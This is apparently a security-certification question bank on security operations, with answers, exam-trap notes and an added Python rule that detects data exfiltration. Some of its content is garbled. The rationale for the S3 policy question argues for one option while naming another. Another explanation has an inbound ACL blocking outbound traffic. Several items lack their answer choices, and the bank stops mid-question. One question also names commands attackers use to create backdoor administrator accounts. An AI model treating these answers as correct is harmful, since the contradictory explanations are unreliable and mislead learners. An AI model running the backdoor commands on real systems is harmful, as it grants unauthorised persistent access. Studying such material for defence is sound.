CCNA Security Operations Questions

68 questions · Security Operations topic · All types, answers revealed

1
MCQ · hard

During an incident response, the team identifies that the attacker gained access through a compromised service account with domain admin privileges. Which of the following steps should be taken FIRST to contain the incident?

A. Isolate all affected systems from the network.
B. Reset all user passwords.
C. Perform a full forensic analysis before any action.
D. Disable the compromised account and revoke its tokens.

Answer: D

Directly removes the attacker's foothold.

Why this answer

Disabling the compromised account and revoking its tokens (e.g., disabling it with `Set-ADAccountControl -Enabled $false` and purging cached Kerberos TGTs) immediately stops the attacker's current authentication and lateral movement capabilities. This is the fastest containment step because the service account with Domain Admin privileges is the direct vector; isolating systems or resetting all passwords is slower and may not address active token reuse.

Exam trap

ISC2 often tests the principle that containment must be immediate and targeted; candidates mistakenly choose isolation or forensic analysis first, forgetting that the compromised account is the root cause and that tokens can outlive password resets.

How to eliminate wrong answers

Option A is wrong because isolating all affected systems can disrupt business operations and may not stop the attacker if they have already established persistence via the compromised account or tokens on other systems. Option B is wrong because resetting all user passwords is a broad, time-consuming step that does not immediately revoke the attacker's active Kerberos tickets or NTLM hashes for the compromised service account, leaving a window for continued access. Option C is wrong because performing a full forensic analysis before any action violates the incident response priority of containment over evidence preservation; the attacker could cause further damage or destroy evidence during the delay.

2
MCQ · medium

A SOC analyst receives an alert for a high number of outbound connections to a known malicious IP. Which action should be taken first?

A. Notify management
B. Block the IP at the firewall
C. Run an antivirus scan
D. Isolate the affected host

Answer: D

Prevents further data exfiltration and contains the threat.

Why this answer

Option D is correct because isolating the host prevents further data exfiltration and allows for safe investigation. Blocking the IP may stop the traffic, but the host remains compromised. Antivirus scanning and notification are secondary steps.

3
MCQ · medium

During a security incident, the incident response team identifies that an attacker exfiltrated data via a compromised service account. Which of the following is the BEST immediate step to contain the incident?

A. Notify law enforcement
B. Enable detailed auditing on the account
C. Revoke the service account's privileges
D. Change the password of the service account

Answer: C

Revoking privileges immediately stops unauthorized access.

Why this answer

Option C is correct because revoking the compromised account's privileges stops further access. Option D is wrong because changing the password may not be effective if the attacker has established persistence. Option B is wrong because, while auditing is important, it alone does not stop ongoing exfiltration. Option A is wrong because notifying law enforcement is a later step, not immediate containment.

4
MCQ · medium

During a vulnerability scan, a security analyst discovers that a web server is running an outdated version of Apache with known remote code execution vulnerabilities. The server is in production and cannot be patched immediately due to dependency conflicts. What is the best compensating control to reduce risk while a permanent fix is developed?

A. Disable all unnecessary modules and services on the server
B. Implement a web application firewall (WAF) to block known attack patterns
C. Enable detailed logging and alerting for the server
D. Isolate the server in a separate VLAN with strict ACLs

Answer: B

A WAF can detect and block exploit attempts, providing virtual patching until the software is updated.

Why this answer

A Web Application Firewall (WAF) is the best compensating control because it can inspect HTTP/HTTPS traffic at the application layer (Layer 7) and block known attack patterns targeting the outdated Apache version, such as specific payloads for CVE-2017-9798 or CVE-2021-41773. Unlike other options, a WAF provides virtual patching without modifying the vulnerable server, directly mitigating the remote code execution risk while a permanent fix is developed.

Exam trap

ISC2 often tests the distinction between detective controls (logging/alerting) and preventive controls (WAF), leading candidates to choose logging because it seems proactive, but it fails to reduce risk in real time.

How to eliminate wrong answers

Option A is wrong because disabling unnecessary modules and services reduces the attack surface but does not block the specific remote code execution exploits that target the vulnerable Apache core or remaining enabled modules. Option C is wrong because enabling detailed logging and alerting only improves detection and incident response, not prevention; it does not reduce the likelihood of exploitation. Option D is wrong because isolating the server in a separate VLAN with strict ACLs limits network-level exposure but does not prevent application-layer attacks (e.g., HTTP requests carrying exploit payloads) from reaching the vulnerable Apache service.

5
MCQ · medium

You are a security analyst at a financial institution. The company has a hybrid infrastructure with on-premises servers and AWS cloud. The on-premises network uses a SIEM that aggregates logs from all sources. Recently, the SIEM has been generating a high volume of alerts for failed SSH login attempts from an internal IP (10.10.50.100) to multiple Linux servers. The IP belongs to a jump box used by system administrators. Upon investigation, you find that the jump box is running a hardened OS, and only authorized admins can access it via SSH key authentication. However, the failed login attempts show usernames like 'root', 'admin', 'test', which are not valid accounts on the target servers. The attempts occur every 5 seconds around the clock. There are no successful logins from that IP. The jump box has the latest patches and antivirus. What should you do FIRST?

A. Add the usernames 'root', 'admin', 'test' to the target servers' password blacklist
B. Isolate the jump box from the network immediately and conduct a forensic analysis
C. Ignore the alerts because the usernames are invalid and the jump box is hardened
D. Run a full antivirus scan on the jump box and check for malware

Answer: B

The jump box is likely compromised; isolating it stops the attack and allows for investigation.

Why this answer

The jump box is exhibiting automated, high-frequency failed login attempts with non-existent usernames, which is a classic indicator of a compromised host being used as an attack launch point—even if the OS appears hardened and AV shows clean. The first priority in incident response is containment; isolating the jump box prevents further potential lateral movement or data exfiltration while preserving forensic evidence. A forensic analysis is then required to determine the root cause (e.g., a hidden backdoor, credential theft, or kernel-level rootkit) before any remediation steps.

Exam trap

The trap here is that candidates focus on the 'hardened OS' and 'no successful logins' as signs of safety, but CISSP expects you to recognize that anomalous outbound attack traffic from an internal asset is a containment trigger, not a false positive.

How to eliminate wrong answers

Option A is wrong because adding usernames to a password blacklist does not address the source of the attack—the jump box itself is likely compromised, and blacklisting usernames on target servers is a reactive, non-containment measure that ignores the real threat. Option C is wrong because ignoring alerts based on invalid usernames and a hardened OS is a dangerous assumption; automated brute-force or credential-stuffing attempts from an internal jump box indicate a breach of trust, and the absence of successful logins does not rule out other malicious activities (e.g., lateral movement via other protocols). Option D is wrong because running an antivirus scan is insufficient—modern attackers use fileless malware, rootkits, or living-off-the-land binaries that AV may miss, and scanning should only occur after containment and forensic imaging to avoid altering evidence.

6
MCQ · easy

Which of the following is a key requirement for an effective backup strategy to ensure data can be recovered after a ransomware attack?

A. Incremental backups are performed monthly.
B. Backups use the same credentials as the production environment.
C. Backups are stored on the same network as production.
D. Backups are encrypted and stored offline or air-gapped.

Answer: D

Immutable backups that cannot be modified or encrypted by ransomware.

Why this answer

Option D is correct because backups that are encrypted and stored offline or air-gapped are protected from encryption by ransomware. The other options would leave backups vulnerable.

7
MCQ · medium

Based on the log entry from an authentication server, which immediate action should the security team take to reduce risk?

A. Block the source IP 10.0.0.5 in the firewall.
B. Change the SSH port to a non-standard port.
C. Disable root login via SSH.
D. Increase the logging verbosity for SSH.

Answer: C

Eliminates the possibility of direct brute-force attacks against the root account.

Why this answer

The log entry shows repeated failed SSH authentication attempts as root from an internal IP (10.0.0.5). Disabling root login via SSH (Option C) directly eliminates the ability to authenticate as the root user over SSH, which is a fundamental security best practice per CISSP and industry standards (e.g., CIS benchmarks). This reduces the risk of brute-force attacks targeting the root account, as an attacker would need to guess both a valid username and password instead of targeting a known privileged account.

Exam trap

ISC2 often tests the distinction between reactive controls (blocking an IP) and preventive controls (disabling root login), leading candidates to choose the immediate but less effective action of blocking the source IP instead of addressing the systemic vulnerability.

How to eliminate wrong answers

Option A is wrong because blocking the source IP 10.0.0.5 in the firewall is a reactive, temporary measure that does not address the root cause; the attacker could easily spoof or change IPs, and the internal IP may belong to a legitimate compromised host that needs remediation, not permanent blocking. Option B is wrong because changing the SSH port to a non-standard port is security by obscurity and does not prevent brute-force attacks; attackers routinely scan all ports, and the root login vulnerability remains exploitable. Option D is wrong because increasing logging verbosity for SSH only improves visibility and forensic capability but does not reduce the immediate risk of unauthorized root access; it is a detective control, not a preventive one.

8
MCQ · easy

Which of the following is a best practice for managing privileged user accounts?

A. All users should be granted admin rights by default.
B. Use separate administrative accounts for non-privileged tasks.
C. Passwords for privileged accounts should never be changed.
D. Shared generic accounts should be used to avoid multiple credentials.

Answer: B

Ensures admin accounts are only used for privileged actions.

Why this answer

Option B is correct because the principle of least privilege dictates that administrative accounts should only be used for privileged tasks, not for routine activities like email or web browsing. Using separate, non-privileged accounts for daily work reduces the risk of credential theft and limits the attack surface if a user's session is compromised. This practice is a core component of privileged access management (PAM) and aligns with NIST SP 800-53 AC-6.

Exam trap

The trap here is that candidates often confuse 'using separate accounts' with 'using separate passwords' or think that shared accounts are acceptable for convenience, but the CISSP exam emphasizes individual accountability and the principle of least privilege as non-negotiable security controls.

How to eliminate wrong answers

Option A is wrong because granting all users admin rights by default violates the principle of least privilege and dramatically increases the risk of malware installation, unauthorized system changes, and lateral movement by attackers. Option C is wrong because passwords for privileged accounts must be changed regularly (or rotated after each use via a PAM solution) to mitigate the risk of credential compromise and limit the window of exposure; never changing them is a direct violation of account management best practices. Option D is wrong because shared generic accounts eliminate individual accountability, make auditing impossible, and violate the requirement for non-repudiation; each administrator should have a unique, named privileged account to enable precise logging and forensic analysis.

9
Multi-Select · hard

Which THREE of the following are essential components of an effective incident response plan according to NIST SP 800-61?

Select 3 answers
A. Preparation
B. Notification
C. Detection and Analysis
D. Vulnerability scanning
E. Containment, Eradication, and Recovery

Answers: A, C, E

Foundational phase.

Why this answer

Option A is correct because NIST SP 800-61 defines the incident response lifecycle as having four phases: Preparation, Detection and Analysis, Containment/Eradication/Recovery, and Post-Incident Activity. Preparation is the foundational phase that establishes the incident response capability, including creating policies, forming a team, and acquiring necessary tools before any incident occurs.

Exam trap

The trap here is that candidates often confuse Notification as a formal phase because it appears in many incident response frameworks (e.g., SANS PICERL), but NIST SP 800-61 does not list it as a core phase; instead, it is a task within other phases.

10
Multi-Select · medium

Which TWO of the following are examples of detective controls?

Select 2 answers
B. CCTV surveillance
D. Security awareness training
E. Intrusion detection system (IDS)

Answers: B, E

Detects physical security breaches.

Why this answer

CCTV surveillance is a detective control because it records events for later review, enabling the detection of unauthorized activities after they occur. It does not prevent or deter access in real-time, but instead provides evidence for incident investigation and forensic analysis. This aligns with the detective control category in security operations, which focuses on identifying and logging violations post-facto.

Exam trap

The trap here is confusing preventive controls (like ACLs and firewalls) with detective controls, as candidates often misclassify any technology that 'monitors' as detective, but ACLs and firewalls are inherently preventive because they block or allow access in real-time, not after the fact.

11
Multi-Select · medium

Which THREE of the following are best practices for securing a data center's physical access?

Select 3 answers
A. Implement multi-factor authentication at entry points
B. Install a mantrap at the main entrance
C. Use only biometric readers for all doors
D. Allow visitors to access the lobby without an escort
E. Use CCTV with retention policies for monitoring

Answers: A, B, E

Combining something you know, have, or are increases security.

Why this answer

Multi-factor authentication (MFA) at entry points combines two or more independent credentials (e.g., smart card and PIN, or biometric and token) to verify identity. This significantly reduces the risk of unauthorized access because compromising a single factor (e.g., a lost card) is insufficient to gain entry. MFA aligns with the defense-in-depth principle and is a core physical security control for sensitive areas.

Exam trap

The trap here is that candidates might think biometric-only access (Option C) is inherently more secure, but CISSP emphasizes layered security and the need for multi-factor authentication to avoid single-factor vulnerabilities.

12
MCQ · hard

Based on the firewall log entry, what is the most likely reason the connection was denied?

A. The outbound connection was blocked by an access control list.
B. The connection was denied due to malicious signature detection.
C. The destination IP address is blacklisted.
D. The source port 54321 is a prohibited port.

Answer: A

The entry shows a denial by access-group 'outside-in', which is applied inbound on the outside interface but blocks the outbound traffic from inside.

Why this answer

The firewall log entry shows an outbound connection attempt from source IP 10.0.0.5:54321 to destination IP 203.0.113.50:80 that was denied. Firewalls typically evaluate outbound traffic against access control lists (ACLs) before any deeper inspection. Since the log does not indicate any signature match or blacklist hit, the most straightforward reason is that an ACL rule explicitly blocked this outbound connection.

Exam trap

The trap here is that candidates often assume a denied connection must be due to a security feature like blacklisting or signature detection, but the log lacks any such indicators, making a simple ACL block the most logical answer.

How to eliminate wrong answers

Option B is wrong because malicious signature detection is a function of an intrusion prevention system (IPS) or next-generation firewall (NGFW) with deep packet inspection, and the log entry does not reference any signature ID or alert. Option C is wrong because a blacklisted destination IP would typically be logged with a specific reason such as 'blacklist hit' or 'reputation block', which is absent here. Option D is wrong because source ports above 1024 (ephemeral ports) are not prohibited by standard firewall policies; only well-known ports (0-1023) or specific ports might be restricted, and 54321 is a high ephemeral port commonly used by client applications.

13
Drag & Drop · medium

Drag and drop the steps for implementing mandatory access control (MAC) in a secure system in the correct order.


Why this order

MAC implementation: define labels, assign clearances, assign classifications, configure monitor, test.

14
Multi-Select · easy

Which TWO of the following are valid reasons for conducting a business impact analysis (BIA)?

Select 2 answers
A. To identify vulnerabilities in the network infrastructure
B. To perform a full security audit of the organization
C. To create a list of all hardware and software assets
D. To identify critical business processes and their dependencies
E. To determine the maximum acceptable outage time for each process

Answers: D, E

The BIA identifies which processes are most important to the organization.

Why this answer

Option D is correct because a Business Impact Analysis (BIA) is specifically designed to identify critical business processes and their dependencies on resources such as personnel, systems, and data. This identification is foundational for prioritizing recovery strategies in business continuity planning, as it directly links operational needs to technical infrastructure.

Exam trap

The trap here is that candidates confuse the BIA with technical assessments like vulnerability scans or asset inventories, but the BIA is exclusively a business-oriented analysis of process criticality and outage tolerance, not a technical audit or inventory exercise.

15
Multi-Select · hard

Which THREE of the following are required components of a Business Continuity Plan (BCP)?

Select 3 answers
A. Alternate facility location
B. Contact list of key stakeholders
C. Detailed technical recovery procedures
D. Marketing strategy
E. List of all employees' home addresses

Answers: A, B, C

Required if the primary facility is unavailable.

Why this answer

An alternate facility location is a required component of a Business Continuity Plan (BCP) because it provides a pre-arranged site where critical operations can resume if the primary facility becomes unusable. This ensures continuity of operations within the defined Recovery Time Objective (RTO) and Recovery Point Objective (RPO). Without a designated alternate site, the organization would lack a physical fallback, making the BCP incomplete.

Exam trap

The trap here is that candidates often confuse BCP components with Disaster Recovery Plan (DRP) details, assuming detailed technical recovery procedures are always part of a BCP, when in fact they belong to the DRP, while the BCP focuses on strategic continuity elements like alternate facilities and stakeholder contacts.

16
MCQ · easy

An organization is implementing a bring-your-own-device (BYOD) policy. Which security control should be enforced to ensure that only compliant devices can access corporate resources?

A. Using a VPN concentrator
B. Requiring strong passwords
C. Implementing network access control (NAC)
D. Enabling full disk encryption

Answer: C

NAC checks device posture before network access.

Why this answer

Network access control (NAC) is the correct control because it evaluates device posture (e.g., OS patch level, antivirus status, disk encryption) against a compliance policy before granting network access. NAC can quarantine non-compliant devices to a remediation VLAN or deny access entirely, ensuring only trusted endpoints reach corporate resources. This is distinct from generic encryption or authentication controls, as NAC enforces a dynamic, policy-based admission decision at the network layer.

Exam trap

The trap here is that candidates often confuse authentication controls (like strong passwords or VPN) with device compliance enforcement, but NAC is the only option that actively checks and enforces a security posture before granting network access.

How to eliminate wrong answers

Option A is wrong because a VPN concentrator only provides encrypted tunneling for remote access and does not evaluate device compliance or posture before allowing connectivity. Option B is wrong because requiring strong passwords addresses authentication but does not verify that the device itself meets security baselines (e.g., patching, encryption, or jailbreak status). Option D is wrong because full disk encryption protects data at rest on the device but does not control network access or enforce compliance checks at the point of connection.

17
Multi-Select · hard

Which THREE of the following are common indicators of a privilege escalation attack? (Choose three.)

Select 3 answers
A. Creation of new user accounts with administrative privileges
B. Higher-than-normal network traffic
C. System performance degradation
D. Modification of system files or registry keys
E. Unusual processes running under elevated privileges

Answers: A, D, E

Often used to maintain persistence after escalation.

Why this answer

Option A is correct because the creation of new user accounts with administrative privileges is a classic post-exploitation technique used by attackers to establish persistent elevated access. After successfully exploiting a vulnerability to gain initial elevated privileges, an attacker often creates a backdoor account (e.g., via `net user /add` and `net localgroup Administrators /add` on Windows, or `useradd -G wheel` on Linux) to maintain control even if the original exploit vector is patched. This indicator is directly tied to privilege escalation as it demonstrates an unauthorized elevation from a lower-privileged context to full administrative control.

Exam trap

ISC2 often tests the distinction between general attack symptoms (like network traffic spikes or performance drops) and specific indicators that directly evidence the privilege escalation technique itself, leading candidates to over-select broad, non-specific options.

18
MCQ · easy

Which of the following is a key principle of privileged access management (PAM)?

A. Use shared accounts for simplicity
B. Monitor and audit privileged account usage
C. Grant all users administrative rights for efficiency
D. Disable logging for performance

Answer: B

Key to detecting misuse and ensuring accountability.

Why this answer

Privileged Access Management (PAM) is centered on the principle of least privilege and the need to control, monitor, and audit the use of privileged accounts (e.g., root, domain admin). Option B is correct because continuous monitoring and auditing of privileged account usage is a foundational PAM requirement, enabling detection of misuse, lateral movement, and privilege escalation. Without auditing, organizations cannot enforce accountability or respond to security incidents involving high-risk accounts.

Exam trap

The trap here is that candidates may confuse PAM with general identity management and choose 'shared accounts for simplicity' (Option A), failing to recognize that PAM specifically enforces individual accountability and credential rotation, not shared access.

How to eliminate wrong answers

Option A is wrong because shared accounts violate non-repudiation and accountability, making it impossible to attribute actions to a specific individual, which is a core PAM goal. Option C is wrong because granting all users administrative rights directly contradicts the principle of least privilege and dramatically increases the attack surface for privilege escalation and ransomware. Option D is wrong because disabling logging for performance eliminates the audit trail required for forensic analysis and compliance, and PAM systems rely on detailed logging (e.g., session recording, keystroke logging) to detect anomalies.

19
Matching · medium

Match each business continuity term to its definition.


Maximum acceptable downtime after a disaster

Maximum acceptable data loss measured in time

Average time between system failures

Average time to repair a failed system

Service level agreement defining performance metrics

Why these pairings

These metrics are critical for continuity planning.

20
MCQ · hard

An organization implements a data loss prevention (DLP) solution. Which action is most effective for protecting data at rest on endpoint devices?

A. Encryption of files
B. User awareness training
C. USB port blocking
D. Network DLP monitoring

Answer: A

Directly protects data at rest on endpoints.

Why this answer

Encryption of files directly protects data at rest on endpoint devices by rendering the data unreadable without the appropriate decryption key. This ensures that even if an endpoint is lost, stolen, or accessed by an unauthorized user, the data remains confidential. DLP solutions often integrate with file-level encryption (e.g., BitLocker, FileVault, or EFS) to enforce policy-based encryption on sensitive files at rest.

Exam trap

ISC2 often tests the distinction between data states (at rest, in motion, in use) and the specific controls that apply to each; the trap here is that candidates confuse network DLP (data in motion) with endpoint DLP (data at rest), or they select a general security control like user training instead of the direct technical control for data at rest.

How to eliminate wrong answers

Option B is wrong because user awareness training is a preventive administrative control that reduces human error but does not provide a technical mechanism to protect data at rest on endpoints; it addresses behavior, not the data itself. Option C is wrong because USB port blocking is a physical security control that prevents data exfiltration via removable media but does not protect data already stored on the endpoint's hard drive; it addresses data in motion, not data at rest. Option D is wrong because network DLP monitoring inspects data in transit across the network, not data stored locally on endpoint devices; it is effective for data in motion but cannot enforce protection for data at rest on the endpoint.

21
MCQ · easy

You are the security manager for a manufacturing company with a large facility that houses production servers and sensitive intellectual property. The facility has a single physical entrance that uses a card reader for access control. During a routine audit, you find that the door prop alarm has been bypassed by taping a magnet to the sensor, allowing the door to stay open without triggering an alert. The security guard station is located 200 feet away and does not have a direct line of sight to the door. Which control should you implement FIRST to prevent unauthorized physical access?

A. Replace the card reader with a biometric fingerprint scanner.
B. Increase the frequency of security patrols around the entrance.
C. Implement a mantrap with two interlocking doors at the entrance.
D. Install a video surveillance camera to monitor the entrance.

Answer: C

A mantrap physically prevents unauthorized access and tailgating.

Why this answer

Option C is the most effective and immediate physical control: a mantrap prevents tailgating and ensures only one person enters per card swipe. Option D (video camera) is detective, not preventive. Option B (security patrols) is resource-intensive and reactive. Option A (biometric reader) adds authentication but does not prevent door propping or tailgating.

22
MCQ · easy

A medium-sized financial services company has a flat network topology with no segmentation between the corporate LAN and the server farm. The security team recently deployed a host-based intrusion detection system (HIDS) on all critical servers. Over the past week, the HIDS has generated multiple high-severity alerts indicating outbound connections from a database server to an external IP address in a foreign country, occurring every hour and lasting only a few seconds. The database server contains sensitive customer data. The company's incident response plan (IRP) has not been updated in two years, and the CISO wants to ensure a response that minimizes business disruption while protecting data. The IT team is small, and the security analyst on duty suspects a data exfiltration attempt but is unsure. What should the analyst do FIRST?

A. Disconnect the database server from the network at the switch port and preserve the system state for forensic analysis
B. Run a full antivirus scan on the database server and update the HIDS signatures
C. Review the firewall logs to identify all external IPs the server has contacted
D. Immediately notify the company's legal department and public relations team

Answer: A

Isolating the server stops active data exfiltration and preserves evidence for investigation.

Why this answer

Option A is correct because isolating the server (disconnecting it from the network) stops any ongoing data exfiltration immediately while preserving forensic evidence. Option B may trigger more data loss; Option C is premature before containment; Option D is important but delays containment.

23
MCQ · hard

An AWS security engineer is reviewing the above S3 bucket policy. What is the net effect of this policy on requests to read objects in the 'confidential' folder?

A. Only IPs in 10.0.0.0/8 but outside 10.100.0.0/16 can read confidential objects
B. No IPs can read confidential objects because the Deny applies to all
C. All IPs in the 10.0.0.0/8 range can read confidential objects
D. Only IPs in 10.100.0.0/16 can read confidential objects

Answer: D

The Deny statement, using NotIpAddress, denies every IP outside 10.100.0.0/16; the Allow grants GetObject permission, but the explicit Deny overrides it for those other IPs.

Why this answer

The S3 bucket policy grants read access to the 'confidential' folder for all principals within the 10.0.0.0/8 IP range, but then explicitly denies access to IPs within the 10.100.0.0/16 subnet. Because explicit Deny overrides any Allow, the net effect is that only IPs in 10.0.0.0/8 that are NOT in 10.100.0.0/16 can read objects. This matches option D.

Exam trap

The trap is the NotIpAddress operator. Candidates read the Deny as if it named 10.100.0.0/16 as the blocked range (which would make option A correct) or as if it blocked everyone (option B). NotIpAddress inverts the match: the statement applies to every source except the listed subnet.

How to eliminate wrong answers

Option A is wrong because it reverses the condition: a Deny written with IpAddress 10.100.0.0/16 would produce that result, but the exhibit uses NotIpAddress, so the subnet is the one range the Deny does not touch. Option B is wrong because the Deny does not match requests from 10.100.0.0/16, and those requests are still covered by the Allow. Option C is wrong because it ignores the explicit Deny, which removes the rest of 10.0.0.0/8 from the Allow.

24
MCQmedium

A company is designing a recovery site for its critical database. The recovery time objective (RTO) is 2 hours, and the recovery point objective (RPO) is 15 minutes. Which of the following replication strategies is BEST suited?

A.Asynchronous replication to a warm site
B.Full backups every 24 hours to a cold site
C.Weekly snapshots to a warm site
D.Synchronous replication to a hot site
AnswerD

Sync replication meets RPO and RTO.

Why this answer

Synchronous replication writes data to both the primary and the hot site simultaneously, ensuring zero data loss upon failover. With an RPO of 15 minutes, synchronous replication can meet this requirement because it commits transactions at both sites before acknowledging completion. A hot site is fully configured and ready to take over within the RTO of 2 hours, making this combination the best fit.

Exam trap

The trap here is that candidates often choose asynchronous replication (Option A) thinking it is sufficient for a 15-minute RPO, but they overlook that asynchronous replication can have variable lag that may exceed the RPO, especially under high write loads or network congestion.

How to eliminate wrong answers

Option A is wrong because asynchronous replication introduces a replication lag that can exceed the 15-minute RPO, as data is sent in batches and may not be fully current at the recovery site. Option B is wrong because full backups every 24 hours to a cold site cannot meet the 15-minute RPO (potential data loss of up to 24 hours) and the cold site would require significant time to restore, likely exceeding the 2-hour RTO. Option C is wrong because weekly snapshots provide a recovery point that is up to 7 days old, far exceeding the 15-minute RPO, and a warm site may require additional configuration time that could jeopardize the 2-hour RTO.

25
MCQhard

A security engineer is designing a new SIEM correlation rule to detect potential data exfiltration. The rule should trigger when a single internal host sends more than 10 MB of data to an external IP address within a 5-minute window, but only if the external IP is not on a whitelist of known business partners. Which approach best minimizes false positives while ensuring effective detection?

A.Apply the rule to all internal hosts with the same threshold
B.Trigger only when the destination IP is in a threat intelligence feed of known malicious IPs
C.Use a baseline of normal traffic per host and trigger only when the volume exceeds the baseline by a significant margin
D.Set a static threshold of 10 MB for all hosts, but exclude traffic to common cloud storage providers
AnswerC

Baselines allow the rule to adapt to each host's typical behavior, reducing false positives while detecting anomalies.

Why this answer

Option C is correct because a per-host baseline adapts to what each host normally sends, so a backup server that routinely pushes tens of megabytes offsite does not fire while a workstation that suddenly sends a few megabytes to an unknown host does. Option A is wrong because one static threshold for every host generates constant false positives from servers that legitimately transfer large files, and it misses small but anomalous transfers from quiet hosts. Option B is wrong because a threat intelligence feed only covers infrastructure already known to be malicious; exfiltration to freshly registered domains or to attacker-controlled accounts on legitimate services would never trigger. Option D is wrong because excluding common cloud storage providers creates exactly the blind spot attackers use, since personal accounts on those providers are a common exfiltration channel.
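
The per-host baseline rule from this question, run side by side with a static 10 MB threshold over constructed flow records, as an added example that is not part of the question bank. The hosts, addresses, partner whitelist and traffic volumes are invented for the example; the point is to show the false positive the static rule produces on a backup server and the small transfer it misses from a workstation.

```python
"""Added example (not part of the question bank): the per-host baseline rule
from question 25 compared with a static 10 MB threshold over constructed flow
records (timestamp, source, destination, bytes).  Hosts, addresses and the
partner whitelist are invented for the example."""
from collections import defaultdict
from ipaddress import ip_address, ip_network
from statistics import mean, pstdev

MB = 1024 * 1024
WINDOW = 300  # 5-minute buckets, as in the question
INTERNAL = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
PARTNERS = [ip_network("198.51.100.0/24")]  # constructed business-partner whitelist


def is_internal(ip):
    return any(ip_address(ip) in n for n in INTERNAL)


def is_partner(ip):
    return any(ip_address(ip) in n for n in PARTNERS)


def egress_per_window(flows, window=WINDOW):
    """Sum bytes per (source host, time bucket) for external, non-partner destinations."""
    volumes = defaultdict(int)
    for ts, src, dst, nbytes in flows:
        if is_internal(dst) or is_partner(dst):
            continue
        volumes[(src, ts // window)] += nbytes
    return volumes


def build_baselines(history, k=3, floor=256 * 1024):
    """Per-host threshold = mean + k*stdev of past window volumes, never below `floor`.
    Only windows in which the host actually sent external traffic are used, so the
    baseline stays conservative for hosts that are usually silent."""
    per_host = defaultdict(list)
    for (host, _), nbytes in egress_per_window(history).items():
        per_host[host].append(nbytes)
    return {host: max(floor, mean(v) + k * pstdev(v)) for host, v in per_host.items()}


def detect_static(flows, threshold=10 * MB):
    """Option A/D style: one fixed threshold for every host."""
    return sorted({host for (host, _), b in egress_per_window(flows).items() if b > threshold})


def detect_baseline(flows, baselines, default=1 * MB):
    """Option C: fire only when a host exceeds its own learned threshold."""
    return sorted({host for (host, _), b in egress_per_window(flows).items()
                   if b > baselines.get(host, default)})


# Constructed history: 12 windows of a backup server pushing 38-42 MB offsite and a
# workstation sending 60-97 KB of ordinary web traffic per window.
HISTORY = []
for i in range(12):
    HISTORY.append((i * WINDOW, "10.0.0.5", "203.0.113.10", (38 + i % 5) * MB))
    HISTORY.append((i * WINDOW, "10.0.0.17", "192.0.2.10", (60 + (i * 7) % 40) * 1024))

# Constructed current window: the backup runs as usual, the workstation suddenly sends
# 6 MB to an unknown host, another host sends 30 MB to a whitelisted partner, and an
# internal copy of 50 MB happens (not egress, so ignored).
CURRENT = [
    (3600, "10.0.0.5", "203.0.113.10", 41 * MB),
    (3600, "10.0.0.17", "192.0.2.44", 6 * MB),
    (3600, "10.0.0.20", "198.51.100.7", 30 * MB),
    (3600, "10.0.0.17", "10.0.0.3", 50 * MB),
]

if __name__ == "__main__":
    baselines = build_baselines(HISTORY)
    print("static 10 MB rule fires on:", detect_static(CURRENT))              # ['10.0.0.5'] (false positive)
    print("per-host baseline fires on:", detect_baseline(CURRENT, baselines))  # ['10.0.0.17']
```

The static rule flags the backup server and ignores the workstation; the baseline rule does the opposite. In production the baseline would be recomputed on a rolling window and the floor set per host class, but the shape of the rule is the same.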

26
MCQhard

An organization discovers that an employee has been using a personal cloud storage account to share confidential files. After revoking access, what is the NEXT best step to prevent recurrence?

A.Block access to all cloud storage sites
B.Deploy a data loss prevention (DLP) solution
C.Discipline the employee
D.Retrain all employees on data handling policy
AnswerB

DLP provides ongoing protection.

Why this answer

Deploying a Data Loss Prevention (DLP) solution is the next best step because it provides automated, policy-based monitoring and control of data in motion, at rest, and in use. DLP can inspect content for sensitive patterns (e.g., credit card numbers, proprietary file headers) and block unauthorized transfers to personal cloud storage, addressing the root cause of the incident rather than relying on manual enforcement.

Exam trap

The trap here is that candidates often choose retraining (D) because it seems like a proactive people-focused control, but the CISSP emphasizes that technical controls (like DLP) are necessary to enforce policy and prevent recurrence, especially after a security incident involving data exfiltration.

How to eliminate wrong answers

Option A is wrong because blocking all cloud storage sites is an overly restrictive, reactive measure that can hinder legitimate business operations and is easily bypassed by employees using encrypted tunnels or alternative services. Option C is wrong because disciplining the employee addresses the individual but does not implement a technical control to prevent recurrence across the organization. Option D is wrong because retraining alone is insufficient; without technical enforcement, employees may still inadvertently or deliberately violate policy, and training does not detect or block future violations in real time.

27
Multi-Selectmedium

Your organization is forming an incident response team (IRT). According to NIST SP 800-61, which TWO roles are considered core to the incident response team?

Select 2 answers
A.Public Relations
B.Technical Lead
C.Manager
D.Legal Counsel
E.Human Resources
AnswersB, C

The technical lead drives forensic analysis and containment, a core role.

Why this answer

NIST SP 800-61 Rev. 2 identifies the Team Manager and the Technical Lead as core roles within an incident response team. The Manager oversees the response process, allocates resources, and coordinates communication, while the Technical Lead drives the technical analysis, containment, and eradication efforts. These two roles are essential for both strategic direction and hands-on technical execution during an incident.

Exam trap

The trap here is that candidates confuse supporting functions (PR, Legal, HR) with core team roles. NIST SP 800-61 describes those functions as dependencies the team coordinates with, not as members of the incident response team itself, whose core roles are the manager and the technical lead.

28
MCQeasy

Refer to the exhibit. What is the most likely cause of the denied traffic?

A.The firewall rule has a typo
B.The source IP is attempting a port scan
C.The inside host is down
D.The destination port is not allowed
AnswerB

Multiple destination ports from one source to the same destination indicates scanning behavior.

Why this answer

The exhibit shows a firewall log where traffic from a single source IP (10.0.0.2) to a single destination IP (192.168.1.10) is denied on multiple different destination ports (e.g., 22, 80, 443) within a short time window. This pattern of sequential probes to distinct ports is characteristic of a port scan, which firewalls often detect and block as a reconnaissance attempt. The firewall rule is likely configured to deny such scanning behavior, not just a single port or typo.

Exam trap

The trap here is that candidates see multiple denied ports and assume the destination port is not allowed, missing the contextual clue of sequential probes from one source that indicates a port scan rather than a simple access control list issue.

How to eliminate wrong answers

Option A is wrong because a typo in a firewall rule would typically cause consistent denial for all traffic matching that rule, not a pattern of multiple port attempts from the same source. Option C is wrong because if the inside host were down, the firewall would likely show no response or a timeout, not explicit denies for multiple ports. Option D is wrong because the log shows denies on several different ports (22, 80, 443), indicating the issue is not a single disallowed port but a broader pattern of scanning.

29
MCQmedium

A company uses a SIEM to correlate logs from multiple sources. Which log source is most critical for detecting privilege escalation attacks?

A.Authentication logs
B.DNS logs
C.Firewall logs
D.Web server logs
AnswerA

Authentication logs contain login attempts and account changes indicative of privilege escalation.

Why this answer

